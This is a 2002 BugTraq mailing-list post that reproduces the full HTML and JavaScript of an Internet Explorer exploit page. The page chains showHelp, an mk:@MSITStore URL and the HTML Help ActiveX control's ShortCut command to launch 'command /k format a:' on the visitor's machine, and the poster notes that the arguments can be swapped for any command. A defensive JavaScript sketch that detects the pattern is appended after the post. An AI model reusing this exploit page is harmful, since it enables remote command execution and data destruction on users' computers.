BugTraq
Re: ZDnet forum: IE formatting local drive
Nov 14 2002 11:35AM
Gossi The Dog (gossi lab6 com)
FYI, the HTML code is:
------------------------------------------------------------------------
<html>
<head>
</head>
<script LANGUAGE="JavaScript">
prog = 'command';
args = '/k format a: /autotest';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();");
close();
}
</script>
<body>
<h1>Testing IE Execute Exploit</h1>
</body>
</html>
-----------------------------------------------------------------------
Change 'args' to a different command (/autotest doesn't work well on
Windows 2000, for example).
Oh dear.
Gossi
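
Added example, not part of Gossi's post: a defender-side static check (JavaScript for Node) that flags pages instantiating the classid used above, the HTML Help ActiveX control, with Command=ShortCut. The posted page splits the classid across concatenated string literals, so a plain substring match on the raw source misses it; the check folds adjacent literals before matching. Function names, finding labels and sample strings are constructed for illustration.

```javascript
// Added detection sketch; names and labels here are hypothetical, not a product's API.
const HH_CLSID = 'adb880a6-d8ff-11cf-9377-00aa003b7a11'; // classid taken from the post

// Join adjacent string literals: "abc"+<newline>"def" becomes "abcdef".
function foldConcats(src) {
  return src.replace(/(["'])\s*\+\s*\1/g, '');
}

// Return a list of finding labels for one page's source text.
function scanPage(html) {
  const raw = html.toLowerCase();
  const folded = foldConcats(raw);
  const findings = [];
  const hasClsid = folded.includes(HH_CLSID);
  if (hasClsid) {
    findings.push('hhctrl-classid');
    // Present only after folding: the classid was broken up in the source.
    if (!raw.includes(HH_CLSID)) findings.push('classid-split-across-literals');
  }
  // Command=ShortCut is the parameter the posted page uses to launch a program.
  const shortcut = /name\s*=\s*["']?command["']?\s+value\s*=\s*["']?shortcut/;
  if (hasClsid && shortcut.test(folded)) findings.push('shortcut-command');
  if (/showhelp\s*\(/.test(folded)) findings.push('showhelp-call');
  if (folded.includes('mk:@msitstore:')) findings.push('msitstore-url');
  return findings;
}

// Constructed sample: same literal-splitting layout as the post, inert Item1 value.
const SAMPLE_SPLIT = `f("document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=PLACEHOLDER></object>')");`;

// Constructed sample: ordinary help-page use of the same control.
const SAMPLE_HELP = '<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">' +
  '<param name="Command" value="Related Topics"></object>';

// Constructed sample: a page with none of the markers.
const SAMPLE_PLAIN = '<html><body><h1>hello</h1></body></html>';

console.log(scanPage(SAMPLE_SPLIT));
console.log(scanPage(SAMPLE_HELP));
console.log(scanPage(SAMPLE_PLAIN));
```

The 'classid-split-across-literals' finding is the useful triage signal: a legitimate help page has no reason to break the classid up.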
Copyright 2010, SecurityFocus